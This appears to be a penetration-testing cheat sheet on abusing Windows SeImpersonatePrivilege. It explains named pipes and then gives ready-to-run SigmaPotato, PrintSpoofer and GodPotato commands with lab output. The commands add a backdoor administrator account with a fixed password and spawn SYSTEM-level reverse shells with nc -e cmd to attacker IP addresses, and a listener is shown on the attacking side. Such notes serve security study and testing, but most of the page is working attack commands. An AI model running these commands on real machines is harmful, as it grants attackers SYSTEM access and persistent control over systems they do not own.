SeImpersonatePrivilege

The SeImpersonatePrivilege allows a user to operate under another user's security context, typically by impersonating clients via mechanisms like named pipes or RPC. This privilege is normally assigned to administrator accounts and built-in service accounts like LOCAL SERVICE, NETWORK SERVICE, and SERVICE. While rare for standard users, SeImpersonatePrivilege is often accessible when gaining code execution through services like IIS, which commonly run under accounts that have it.

Named pipes are a method of inter-process communication (IPC) in Windows. They let two separate processes—either on the same system or across a network—send and receive data as if they were reading/writing to a file. Think of a named pipe as a virtual file that one process (the server) creates and waits on, while another (the client) connects to it using a known name (like \\.\pipe\mypipe). Once connected, both processes can exchange data in real time.

In the context of privilege escalation, named pipes can be abused when a privileged process connects to a pipe controlled by a lower-privileged attacker. If the attacker has SeImpersonatePrivilege, they can impersonate the connecting user, effectively hijacking their permissions.

SigmaPotato

is a tool that leverages a variation of the "potato" attacks to coerce NT AUTHORITY\SYSTEM into connecting to a controlled named pipe. If we have SeImpersonatePrivilege, SigmaPotato lets us escalate to SYSTEM, executing commands or gaining an interactive shell.

$ nc 192.168.225.220 4444
Microsoft Windows [Version 10.0.22621.1555]
(c) Microsoft Corporation. All rights reserved.

C:\Users\dave>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
<SNIP>
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
<SNIP>

PS C:\Users\dave> .\sigmapotato.exe "net user dave4 Pass123! /add"
...
[+] Process Output:
The command completed successfully.


PS C:\Users\dave> .\sigmapotato.exe "net localgroup Administrators dave4 /add"
...
[+] Process Output:
The command completed successfully.

PS C:\Users\dave> Get-LocalGroupMember administrators
Get-LocalGroupMember administrators

ObjectClass Name                      PrincipalSource
----------- ----                      ---------------
User        CLIENTWK220\Administrator Local
User        CLIENTWK220\BackupAdmin   Local
User        CLIENTWK220\dave4         Local
User        CLIENTWK220\daveadmin     Local
User        CLIENTWK220\offsec        Local

PrintSpoofer

Escalate to NT AUTHORITY\SYSTEM on the same session:

PrintSpoofer.exe -i -c cmd

Create a new SYSTEM process and exit immediately without interacting with it. Suitable for non-interactive cases, e.g. WinRM.

PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"

On the attacking box:

$ nc -lvpn 1337
...
C:\WINDOWS\system32>whoami
nt authority\system

Spawn a SYSTEM command prompt on your desktop, for instance, when logged in via an RDP session.

# Check your session ID
C:\TOOLS>qwinsta
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
 console           Administrator             1  Active
>rdp-tcp           lab-user                  3  Active
 rdp-tcp                                 65536  Listen

C:\TOOLS>PrintSpoofer.exe -d 3 -c "powershell -ep bypass"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

GodPotato

GodPotato -cmd "cmd /c whoami"

GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

Resources

PreviousSeBackupPrivilege NextPermissions

Last updated 21 hours ago

Was this helpful?